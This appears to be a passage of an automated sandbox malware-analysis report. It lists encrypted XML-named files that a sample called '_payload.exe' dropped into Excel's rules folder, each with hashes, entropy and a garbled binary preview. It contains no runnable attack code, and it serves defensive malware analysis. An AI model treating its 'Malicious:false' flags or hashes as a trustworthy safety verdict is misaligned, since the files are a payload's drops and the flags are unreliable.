                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510009v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1192
                                                                                                                          Entropy (8bit):7.840771255354786
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:rJpU3cjCe8Q1/yupgOkNBWjFdcf15P7B+BG7SRCHy2bD:rJsCCQpgNNB5jkBFuD
                                                                                                                          MD5:AFB6C289737A3D26739BDF4268236BA9
                                                                                                                          SHA1:2457B02D7DC406895354403DDBC21506E7791A68
                                                                                                                          SHA-256:0F4C6DABA7AEADBB23B1438DC376FC59853B89A541F63DA8AE34711596CBAA88
                                                                                                                          SHA-512:A1D52B7C275964D884788A2D6EBFC80C36D0134D8CC05AB638175962E5963F3BE871DA059D484346C264A3AA6FCD5D3D065457D6608F2DEC8AE30952E261306B
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..b..y.3...:..U0.~........<?........w...-R3.P.#........T....mglV.?>....B.B$">.B.3^.k|8.../..U..K...ct)|..?..#..Y....L.....-~.|.d..O...!....).@.I,...t..t9v.=............I.F.+...M......C D....hS..%Ko.Sx2.RWw>\.3...^.u...j.,'../1....<;Q.U.x}.X..(.`f...G..........\D...y..F.*&.#E0y.......(/.......[..(.B..N6%..Y.m......t.r.7..1{..Ts_.*.z9. .P'...@.?.un...#v!.Zp..s".}.O...0..X.0....... U..Z..:8......m.....c]....<..*..[.s.wP..a#..&....#[.. .A^....c...Rne..4.n].m.|.<z.`d..{.P,for$;d7.\.5.O.i....m...8.f..>U.J6O8..6.+.G.JQ=....X..9....Z.5.o.7..M.-...>.&'G..}Sp.2..j>.6.].....VK.J...~"9..G.....2.h.W.. U.[[.i3.-u."..6r..p.%....*.:..f...Q... H.b....|....%...d.......[he.h....W..%..7.w.Y.}...Xl:...D..g.vy...Xv.F.....=..NkjH..R.h.k..<Q0..d.#...1..r@..{..h.G....!h..=." 8t.n*P.F..9.w5r...5...oq1.X.+.&..i......1.g.g.$b.u....?...pi.I..p..iG..4...O.T..... ../.n..?.h.@9.S0...n1.....at<.H.%.........S._>..!Z..V~.>.Z.`.WP!.q.D...'.s....b.R:fn..=..l...U.+...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510010v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1031
                                                                                                                          Entropy (8bit):7.787399621943011
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:t96kDjwcweFpDXZLGSLrC8J8jkPe5q0HZwjLp4f+W3QbD:t96knFpLG8C8kkPQZZbaD
                                                                                                                          MD5:86A53E54A0372D62B35460724FB067F2
                                                                                                                          SHA1:F1322C01AF69EC9244B93EA1EDF1EB5B5DB7C24A
                                                                                                                          SHA-256:ECAFED7CF848ADEFBE87426BDE447D0EE5C17773BCEE650D69FB2EC4B78F73D1
                                                                                                                          SHA-512:5A7A692DEC63053379F8EE6E8427D7D143799D99692AF9657423F272CC43868ABD8DA6E135C857500C23798A57CA8DD6FB951E214EB45D153ACBBC3C2745F9F2
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml8t>;..../.eku...<L\8...b.-..."..;}..c.(.......>...;yy.J0 LN...."|...l...U.Y.|f0I.....uy..J...u...S..o..Gd....DT....CMYM.CY:...J.6PN......P.....T<..<..I.*.}...;.n........;..=...v..-uU.=.x.o....4..Qu6."y..!...fM....P.......=x....tg.c......J..9)..V.5*.{..c.q.....7....d....A~....W..u....q..0`.&.w#.....!.~nD..R...^i.G.m.....l.r...|.{.V/^O..f..}O5....v^...,......b.f..d.."&x.F.../?...s.w_.j6....R........K... "6c.....8.96.W..R#O...............4...*"..T\RDv*1?|O.(W.p.l..y...^.6..M.....p.`.=.VG ...o=...^L...{.17..j.2.k....l...RqU{.D..F.N....<.t...a.~...z.<.F...H.A.Y.dF.Z.r...K..^.uE.>.,`.R)g....Q...Ua-?...-g...\>.a..c=.`.......[.n.h...!.e_.......Twp.pV^..\..../..$.5a..BR..,.2.....F.......[........@.u..._O.&.2.A.....yAs.....2..+d*....'..[9..;y..Q^...V../...'.1o.Y.....g...&.._...y0<%?_N"kGf..8..g.:.SZ++`........~..".......>....?....`<.......J..8s.,.r(?t..!R.\*...E^.K.....c.....r...V.VW......'..t..rhphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510012v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3884
                                                                                                                          Entropy (8bit):7.947900478243085
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:NmG3dyNxGV3LgZt3nSG001nGKnsZ5859VNhC8:NmGgNgV3sb1nGHveNhC8
                                                                                                                          MD5:92E5D55F99F1CF232727541132E0B00F
                                                                                                                          SHA1:CB1469E248EB07A803BEA20A2F55358FB0DF8901
                                                                                                                          SHA-256:5AD37DA69DF1FA13BCC4359AC235D0D60D9AB832072FC6C753DACA9DE697269F
                                                                                                                          SHA-512:29EE2EFF4220B4DAA36C1B0B339B258C6A6D66BF1A816029A302DAC1FD8F0E0C38A92BBE4E4E203008ECF37CDEAAC2B823006B99B9A3AB1A62A2D88E0238DB9C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.K.s..Y&T........\ .....f.....`....ZD..=.A...*.Yy..cj.|....Cs....cd..?#..S....q.y.......5......U...5....+#.Jn....-W.|.`.r....m...n..=.+....z.R.b......F.p....\.hq.$,...s....;.....Ox.....AU.........M.C..k.`>.."=`.j.[0...;.=.|.`.w. \..a\g+}...c.4..I.!_<..H...=.......5...:.....B.gJ.<;.8.....9.e..9...3F.b...+.hs?......~O#.....ea>...3..:............\.-BOpEPny.<Q..4............"b.l.......\............^..t.y..Wi.6.;...:.J C-_......G.#8..vt..`e.Fn..-g.Z$.EK.X.U.[..s...t....d....b....+..G..g..@...m.,>.Vx.ayB{Z.jHV.I...c..*.!El.}_&j...EIV.l..H.q..H.kq.G.BM.^h..!..h..m..|....6...4.>.W.{.fMq.#.Y..o.?.^.Cv...l....=....m."E.....)..P...M....Z<3..i....S...'`.A..P...6...<..Y..3..r.m.N.{...j...1.:....&.a....^.[..E...c.'...]s..pgz.gf:.....[6.6...#..$w..&..0...#..=5N....c....\9.3L\.wW.A....q.l..fU........J...N.../.3y.{....8...>...o^..p.$VYC.8...J......y.U;.....\....>...._@..S..}...|.q..d4.L.q.....H}../..w..\2\.|5...).d.FZ;.X....Z`p...a....K.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510015v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):790
                                                                                                                          Entropy (8bit):7.71024080706124
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:VYpynGSt0wInkwA5zap02AxoGL5j3V5S6zVig0ZFhIulTBEW9TTPG/kr97DGPkLD:+SG7URxo6Bq6zViogTr9TTu/tPsyEbD
                                                                                                                          MD5:DCF9BA5493C6E4EE0FA7A465F660BDC8
                                                                                                                          SHA1:2D258357A1D3A33C1A005BEDFD4954F47267CD5C
                                                                                                                          SHA-256:1A1C4CF70C030866060BE85E097E48CD5A178B2CFBB25B3BB3F467FB44D0DBCD
                                                                                                                          SHA-512:E15A411855E2E1F533ACEDEACD52A66C472E2F643EF26E89F38DD6395DDDE73CA9678A8FA05ED1EA1512C935658DDC82E3350F3ECA464C79A8E7397A5610D83D
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml. ....h....)..j*q!.J...T.[A..r<m.0..DB.4.n......J..A.}...Q.E..T7.7../m..H.:..H.gT+..?U...J.y3.=O.hY3&eQ.y.5...i{.....R.d.;E`.!..@..j%~.{...wq#....j5.;...`n.}..?u....S.^,GN........./n...".:.hr:..&..*j.y...N..@...g':....u....Dc|....R......x.5.0.e....h.+.....>6...Xq..R..p/Ll..8..F..m|.J.....h..._&C{n|..o...h.4...,.YPN..Th...RY..|po...n..:C........}......c'.<F$..,.M.5g..ZC3..:B.....Q}..Nx.#r.....#n.....^..?.....`..../7.V-.r5...>...x..|;.*B.;.}..g...W0Oi...:.....f.-..M..0.O..m...)-..W%.0......1.7._.x.cw...=Tv.K...R5..MVC..]G<...F...J,xC..X0....-~........4Twj.^.R.. ..N.z5..(g.....C...2....on.h.H.s.SS).h.c..k.fr...2.?....2q]...Cy.".7n,...8.<.p...R...7@.e.#..x.5.3...phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510016v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3934
                                                                                                                          Entropy (8bit):7.945266272344825
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:EH6Dk4AUjCO9w7FrwCqL9pRKWyrm247fbnrrRFONm0xA3Q/B:q4AUjt9eCL9iWem/frrrRwxmeB
                                                                                                                          MD5:28110FE4BC6079B0FF625005D1FD6B8C
                                                                                                                          SHA1:0CBBFA832BF75A2A59446E21D705233AD55F1147
                                                                                                                          SHA-256:DF5BAB99C9702D2A665B9E68ABAA365CC38D16829FD39E4C46E3AB75B79D573A
                                                                                                                          SHA-512:D97825961C5725DD32F402B84CD752FBFC84520F42CFFF250B81BD2F0DCA423F072677561375D66160C46D596D661539F7B31F80848882426A0CD33E3DD8E1A8
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.V*5...J.3..V^8pP..[.SH..*\<..p...q3L..&K.J.!.4..U.h..Q...-..9b.....[p.0.}...:6j..}....'....]....s'4.....#J..,..r.....?R.hq.a..X3.O.T.[.P.x}. ./....Z.....WO....t.h..w..9.........E..rb.Z..O..D.H.I.....O.G.qX.DiYR.9....Q,.....~.n....W...A.....a.o..\Nm..}U.n..W..C.(.B.....M$.VC..|lQFdx.....{4^.4...g........w.. .W%AL...NPHJ.......20..fD....A...W.OKK.s..lW...v.].4..sb7.....T8.k..p~y........).w'3..X..9\.].s...GS...Z.~F....."F..........^..+.[k..I?.V..%o....1B..5...p........K....C....%...(.;N...& ..LT.8....8j....r-.....y....!.U\......S....@...G1mk..C...s...uv.'."&.m0. ,...-h..q......I;[..l............,.w...j...."....V9\?.<c...BA!u._.....<..c.=....,.,......R.t4R..C.,G9......L.....V%.....N9....-3.!YfK..7#3.0W.ID.E.)...S..x...n.`Z...!..b.....e.....q......J....a..<.....;.......V.$.8u.a..........K.].........'.T.2......._<....W&)D.()...*l..X...x.=..(.l..O4..(? ..Sk.*..$...l..!1..B...E.a...{.,....")..YF.$.pl....V.X.`<..x#...oZU.S...S.#.1...$....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510017v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1148
                                                                                                                          Entropy (8bit):7.802266745893204
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:+gJX8iQqUa9blQ+J2gEa/iDsERfYO2qTgH5BrcJeF1bD:BbjUa4JV1vr2qwXrZFlD
                                                                                                                          MD5:0E5E2B2D396F3DB78930651A59474ABA
                                                                                                                          SHA1:C5DDDE8E3C7A7FD99A6AACFD52AF7CB9E21164D3
                                                                                                                          SHA-256:C306C798907F87280C15BFD197BB9764BF9450C24E254B08944487B1B47963DB
                                                                                                                          SHA-512:AF655789E4AF2376D517FA218DBE2BB06D6BD820CF96CBA8BF997E7EE29EBAD97B4A4DB9338DA76E4791D581778AB7125AA3AED447077991EC3FF2BF62C997BF
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..?.y..|....K....$..wnR.{.Y......B*......@.-.lx..|..jB=p<ep.5.*KEP.... 2...N.f........e?...j..q.2.B.Hk...x.A....'..xa.).U......_.c.O....[.B8.j..UO.[.w..Y<&..d..yp.Z..F...>.A.lrZa /!9......7..F.K...D..Y......P.m..w.Fe..Lk."Z..U....e..c..l......Z.1......lV\..xI9........_...bjI.........=$..Rw'0.f*a.U.........<!.V...D.....Ee..,..M.,..B....R..o....x7..z,..T.....1.U.W# ...n....?._..a.m4O..n.f[Ur!..4.CALVj.x.w.e.4^...*.C.0....:.=2.C7...d..=..F.5@..}....F||....QxEP.N.K......5#.........l.j0x.........y..4v.1oF....I.&.U ..~g.EHO.>d.i..>|F...*...Ss.wc....#4..<H.....P.H.f...tq..TUS......}W<..n%.........t.cN...=....E._u4iD..0}..gT....|.J.s..........>...I-.Z.).P...0n..+R-..{!...J...lY..O..j..I........c..}...;:..p..E..:U7.....0.u.A#....|K\.Ly....^.H../....gF.*.U...tb..[e......_.H..,...M..B.[..k...+bb..R#..V."Pk...W{ .^.@...@0\w.P....}.n-.~*L.k.bg3.4..H..'u)0...).7R....35.x>.$..5,..r..l.t..D...O....E......D..>..P.f%6..i....^.S.B..z,V@.%..B.......

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510018v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1782
                                                                                                                          Entropy (8bit):7.881926431908491
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:rhrMs1lI9xML1E+DCyJ3yogM/TFtHOKN+KUiJAD:r+fQE/yt/tuK52
                                                                                                                          MD5:ECF6D2F446768E6D33E4C44B4A1DFD9A
                                                                                                                          SHA1:E5D5C62494CA1742050AE388D0DF58E25A37C467
                                                                                                                          SHA-256:FA9D6BCEA80D5E0E3A00DD9458C49AED26842B0449D2D524EF56D9D8B74F30A9
                                                                                                                          SHA-512:0B2E6AF24D0899B29DED9C350AE7C8C408F4966CCC6BDE2C54BB46B04C177DCF37590FD6C6A81C8E01417ECE4D7E2D79972CF52F031B0E0D8B1186470446D3C8
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.X. z...)(.'.hJ...t.b...Ag5...jR.s..o..?.Dsbv^:.Tm..`gp{...k.(.*)..<..0d..J.A.O..s(.r.....%....._t.t....N.H.1.}.i..v2.....o.qt..T.2.e5,.......?#.S.....:...]c..O.a...po.....}.U.eqw>.L3...j*......f6'.....[:.+......I3..~5....j.P.lk....RX.@.t..y.....+=.\.,......l....F..'._x..A..^.r...C..6&[..wb[.V.-.$..E.&.[t..a...W.T..#f.,.J...x.j*.tqr.L~...b..b9...]#..RT %......S8... 1..f.....@.Ui..r....l..w..........ivI.._.......L.Y;............9.....6I..@....3.....Y.AJN/-.L{...Oj(`...g....t.WG.W...(..B.iSZD.t....z=.Go.at!..yrAA..qS[.P...i. .(.g...5.f.]..!.e......}.!.1|.R.]....Bm.b.._?........?..B.g...#er.0y..c..;.z.6&.b.i..F..3...+c......l.Z..zX.Z..;Iaf...........4...n.z.\...c.hw....{)..".h*.......s.ik...Z.2=x.SD...q.\....j....*..........[.j..a..&....Z....\kp.|S4:.RL.i..\.],?`......- .. `..+..W.'r9.Z....wM.Hl.*.Y.3.`.\.........=.zK.:S8m_xys...P.........2.l..a..*9..L..M<6..r.....-.*dV.=...]9....E/+".-v....-...7y...5..9....{."x&@.]b|.3.[

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510046v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):791
                                                                                                                          Entropy (8bit):7.691839455272522
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:MpYUwbw82gDUymOJ4S1i0zw6ISGSNraAQ1QGM+bD:o3kgJOJFzzwvNACC8D
                                                                                                                          MD5:5E4A6DC9526B0D502892010E11670EC8
                                                                                                                          SHA1:0816C1DC5B09DDEB5302D810D8CCBEFC18140B7B
                                                                                                                          SHA-256:6516D2C513DCBEFC73909DBC32620FC577DA0BFA8B8EAE1B16CCE210E6AA1813
                                                                                                                          SHA-512:A7A7ED79434CB25DE3F4876658BEC045F7AD143F83579949C51D517E28D6A5959EBB2A663D319999F5B0937F17CCAD10038785A080F9151D37C281129E8D8C61
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.%......d3a.?k...ZP....y.......S.H..Hq...@...pv.Z.-1.....Y0.!~Ga.ND.b..r.i..k.}........2..D.`.X'f....7S..vr.E.................s 9.|......p.....S.\W#......Io4W;....j>.I...!....5.].w...D.U.......&.,.u........:'..R.._.X..*...Vp...r ..c...*..(.....[..Wq.....b.w.V9.9..I....@...F..NF....y.J.U&c1.AQ.......*Ue.|.k[.6g4...p.'O.........&..y]..........d.V|.....'..dbk.............U..y.R..u_PH!Y...w...>..r.<|.......A..HV\4$......&0h+j).j..hQi.O..ha. ....E.o..p.m...T\).....b..*,......~q.'..L..........uE...w....N..._.k.....#.....}?w.@....VDU....(Z.....D.H....o.t..<j1.uNt....r...DAL.H.k......V.u..~....}z.I.U8....gqn...,/...|."....|.....).......$.t../@.6|).2..1.qD..ZbD..<.-1..|}Z3..Z..phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510047v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1082
                                                                                                                          Entropy (8bit):7.788664428089585
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:k7sy/t2SDqg21/8R5IvejVpvTIdO9nLg4nYovyEXBbD:+sy/t2SDx2mkejVhnNs09D
                                                                                                                          MD5:413BB944F978F86495A2217E05C4E36F
                                                                                                                          SHA1:D6794A0B487D72B6FF26B60A37C9D0D55BF5E1E2
                                                                                                                          SHA-256:5CFB39F8E29C605AFDE79D508E6D32F3237207B5F194D03C084203AB807CE447
                                                                                                                          SHA-512:8B371F4A13E910BBE17AE1A36F719198FD0AF6FCDD0441D0999A631492746B3C9069912F0ECD807C9858FD9550FC3D1B8D49B0CC456D8E67828318366FF9D3DC
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...<..qrY.6.."[.D.`...vYe...H.T..K7....C........VD...[S`..{S..$<P..8..A.v{00^....Q...9.q...'.FF._.S.....*...C...g..%..... .~.T..s..`_u..I......F.D...S.v%s...G1A.^P...".n..z......e.#...I..ZB.AV;..d.r..L.{K..`l.U.m+.H..A.J`.'...E`.....).....4.o.H.RUZena#0....s.^l^...$.e!...8........L7..Sr(......i6....k..".....6...z>...YK....*.a...H...7t..R>k0......8ME.....>z.9....M...zz....*2..J....!..HP..>....D.|.3b.j!I.j..W...zw.q..:}n9.%&.....WXHC.,.#....:N..q..c#...Cq*$zGF....a.mr.d_.%...IfY....#.A0=%5.Fn...(q]g....\.\W#r.u?.....w.f..2...b..q,D/;.x..z....m.a.Z..~.@T...'.....k......$f#..h....r}}..!.X--_6`.o{nI.w..7..g...b.O$......R%..)ye....d.+..A..1.....0..d..*.y..3NW...o..a..>M.+.E;..m.>T.~0.}.U.+Bt.....i.4.Sj...~,. t.!E!`..9P....-s.Qd9.y..?..yJv.A.........F....I?. .r.i...=...w.C|-ab.......0..k.a..,.....&....F...R....I....wHI..U.....;*.[\.....{i5....4.H......9...%.S..y'}.A5q..?h .T.S.._.Y.N.{K..~.~....wY.G2...7.w.+..n ....*A.).T..1...[.k...w......

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510062v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1061
                                                                                                                          Entropy (8bit):7.780643586720442
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:Ld5HrHmwoq1VVtemxclKZAGb9WYtcgOdj/SbD:rHrKqBtyYPWs/QAD
                                                                                                                          MD5:CC1C8622788B32F8B2AB25391DADCC46
                                                                                                                          SHA1:E94C40F0BE0C7CAFE9C675E3C29C2C1D976B2D9D
                                                                                                                          SHA-256:0E753C7D8C8006F845DD7532E72E481F9EB678D1C1BE20D3B5EA570F7AC84297
                                                                                                                          SHA-512:6A655AA403FF84CE99D60022FDE5995AC89837158293FFC8F9F0660740C095E4A8F43112CCEAD6FF0DAA6E4D15170E151D4E1B7EE3D6BD33389A3FE4C0AE3E0E
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.......qJ.M-.....'....f.y.l+\.Md.g....G"...@..AN}N..V.S.qr..o.....us....4....j.7)2.".p..a.b..,.R.%.2....h.p......s.cb..5....}...G..*.].d..:..b..~..H....(5.a....+......6S....L....2....`...=D3.5....8.....'FTi.Jf.0:.._....S:..F=+..*.^j...3..Yi<.l.......&B...t...0Q.R5........R?...7cU=.T..h8/d.....|.E....KMv.:.Z,.s...Cq........]...\...S..].j<..W.U.H /=2..9.......T'H'k.Y+.AA...GcE2..P..Y.w....y...t.=.Q....@..<....g[..=.9k....7.<!Y4w.D!yxb.1s..p.7...O..3..{L.....3..g..[.e.)(.."l....D......gb...z.Par(...7)..;.Z!x.j].0l.b.w7..t..~.7^...D.*....vZ ...~7D......J.\....K....lL....y.1..`..[b(_.r..<....Q..{.FmU{.~.e...MR...3..`...>...|.4............J.#..R.D.....6..C,./r~...5Ro.s.P..c...1.jKxV..tz2+~!.....^..q6..BX.;..[EB..00...0..9....e.1).=N....\)........UM..X7q.....3..t....|....?,H.m...vL.G..g..O..a..|.......WP.8..4.B.....r]P.)......'..).Z..| .:.R+.tcu..: n..x.f^.|...-\^..M..j...Es...y....[.....'.}X^..X.J2..........2..`..i....K.3..}.z..phJtdHo970vyx7vwl

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510063v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):801
                                                                                                                          Entropy (8bit):7.711110270134245
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:LJScg8LzCPrLH9z45wzY20GWIcJEdouEbD:LcwLmXcY4kAD
                                                                                                                          MD5:9B69CD12F2B5D680AF469E1F72960E72
                                                                                                                          SHA1:BB49A6FFBC19A99F618FCA9310327632A962DC05
                                                                                                                          SHA-256:48AE7021D47C1F3215F3E763092E9419C8C042BE301471819582CE0F54E6C4B6
                                                                                                                          SHA-512:2C47586D074952258C9CCBDFD3A25D2D68AFA4BE3486352139906837DC49003F55DD52007E33AFB9D91C4A5A7F9446E100EC744240D22452F0EFB066F2683D9D
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.V.;U.}.>....@..:o+x.0@....._4|....H.....[{o...B,.=..Hx....O[.%PR.\.H.h.....7i9#.!%..d.....d.a.....&.....U"..h.D.Qr..Q.....!Nr..I#....H......,..BO...(.....2.)..gi.V..>......K>M.z.."#YFE'...y4..]b.M.........Q..`;...'..<..fb-o2_,^o.....2.....c.]...|.}...z.].pj.!...C..f'..^U.9....h...&b.C)..!. .1a.].F.._..Eqe*P..7.l.2.....1...l.'.K.......23.....A..[.<Q.&..f.V...#.;.}.G..*....5w.:.......Kl...)W..21..C...9..H0WD.g.....M...E70q:........_.#..%.W=.a.s..H-...).'...2...c..wT..."k.. ........O.......YZ%.r....k...;AJ..."....&.0..x.6p+...,.......5....3.R...LD...h.F.)..O..0.U.;I&....4."...l.M|.1..*I.....W...C.$.l..h.W...5GR.+...+ uV...N..*...e..i.WM.#K*.@3.=.ug.k...AU...YU2......`w.k0m...!.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63028v4.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1485
                                                                                                                          Entropy (8bit):7.878553274816627
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:1nkLp9a5lE1uf4fuBivvZHf5GuB2s8Pb2WwE3ekmlCV6/8uAiMc63PZlnrqOpKq3:+jaXYuwfuYHx4RZYAN3BprzKuqiFpglI
                                                                                                                          MD5:3452A8F4C469F3612D2862140845A945
                                                                                                                          SHA1:7FCBF4E55CB7BFFD32A8C1DC7E96C93DD7611E41
                                                                                                                          SHA-256:1E5CC5F1AEA66A4BAEF794C27D0ACA6A6BBDF6074043B6035631E539CBABC7E6
                                                                                                                          SHA-512:4738EA8C23A28BE933B3C438FF43E32CC3C3B38E3BB56D591FB5D820CECE35F329C732EE498CA1660A04BE6CE8CA974D2E0BE33C5F3FED0B872C7C73E1B015FC
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...B...:..`....;...sz.......L....P.D.L..~....w.........v...I.....GK[..|y'."b.....'..}...".....}Ek.......A.....q...."....T.....#d.(..=..d.Q..AX.-@..0?%.3.5.t.....y!q!....w...X.U..*7.t.{I......\......._...,.1l..+.i...y.%..M...7?}....D.=....7..ZK.qP~T..>..u.V......h.....`&0.f...W.D..p.G`Zb"..4.T......O.G..I.....TxWU............4c.}._.*.=q.).<.z.6V.hW.......G.Oc....q..%0..-.U.M$..-...*.b..K....MR.2.!...n.....<C....hz......!..\.z...Ed.zH..m..amXx.6.......q.......IY.K.4.F.yL.,i.E....K..s............e..K.h^P@.....%gL_&.{Z).c.../...D.5.H...uM.Q..r..&W..++0.U.Z.+.P.@.T.P.b"sk.4....a.M>...a4...-.3B..x{y.T.l..w....sr.|..2...EHJ`K..d..u.d...%..#_].b..v.l.c.B..[kYgU.v._|....v.M.=....M.T.%i%.eF...4..e..c....1:.&..T.K.. ...u........e..z.Q&.Z(.nK.B...<u.dF......E.|.]..&p]..%...^.(\mo..F......."YNaUX..c..~.G......S...?...z[X.U.|......ZDO.....m..B.s..{...2E.V..@...m..{..x..s.u..3...f.`.......O..k^6..r..0.t...=.Ahh.8...)...(V\7.D.....1.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63030v2.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1340
                                                                                                                          Entropy (8bit):7.822965497933522
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:tutNDWV/C9mlhlvE3PzxXIFaThZsHFuQdjpKjIZnDRIg5bD:tu/SwYoLTkHFTjp02nDtD
                                                                                                                          MD5:6764F9B0D2603D13DBBBBF1897BA49A8
                                                                                                                          SHA1:06F6212E3E34CB91A07BC51A32F11C42F9AF103B
                                                                                                                          SHA-256:B2B40D0226215F51E43C36F8AB0F4930E45CF1A08B6163A457833DC7E7BDB827
                                                                                                                          SHA-512:B60056D053A7DCD5CEFE91FC329BEA9BBBC71219C4DA569A4C281F6C20502865A0D34A98AF2C0E20E65379C1FB5D243FF7134782EB6B0EC77861800DE55C70D0
                                                                                                                          Malicious:false
